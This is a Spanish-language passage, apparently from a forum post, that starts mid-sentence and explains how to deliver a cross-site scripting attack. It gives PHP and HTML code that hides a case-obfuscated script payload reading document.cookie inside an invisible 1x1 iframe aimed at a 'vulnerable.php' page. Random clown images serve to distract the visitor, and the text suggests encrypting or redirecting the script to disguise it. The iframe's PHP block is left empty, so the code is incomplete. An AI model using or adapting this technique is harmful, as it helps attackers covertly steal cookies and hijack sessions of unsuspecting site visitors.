o con onload="alert(document.cookie)" pero si vas a hacer eso ps entonces mejor pones el javascript de plano en el html incrustado pero para que no se vea o por lo menos se disimule que se haga en un iframe y que ese iframe contenga un javascript cifrado talves con "web encript" y que imprima un location hacia el xss, es mas, ni si quiera necesitas hacer eso, basta con php y un <?php header('location: ...'); ?> ya que desde ajáx no compartes sesiones como para compartir las cookies haciendo llamadas remotas. Es mas, ni si quiera necesitas insertar otro archivo en el iframe:
<?php
$xss = 'x"><sCrIpT s=d>r=document; alert(r.cookie);</ScRiPt><br x="x';
$distraccion[] =
'http://www.unaplauso.com/images/anuncios/3/9/7/793_animacion-payaso-pitiklin_2.jpg';
$distraccion[] =
'http://www.ctv.es/USERS/hnostar/TECH/V9000/payaso.jpg';
$distraccion[] =
'http://mikevsdinos.files.wordpress.com/2008/09/payaso.jpg';
$distraccion[] =
'http://www.galeriade.com/Sirona/data/media/3/Payaso_Moderno_-_DSC_2512.jpg';
$distraccion = $distraccion[rand(0, (count($distraccion) - 1))]; ?>
<html>
<img border="0" src="<?php echo $distraccion; ?>"/>
<br />
<iframe src="http://www.victima.com/vulnerable.php?variable=<?php
?>" width="1" height="1" frameborder="0"></iframe>
</html>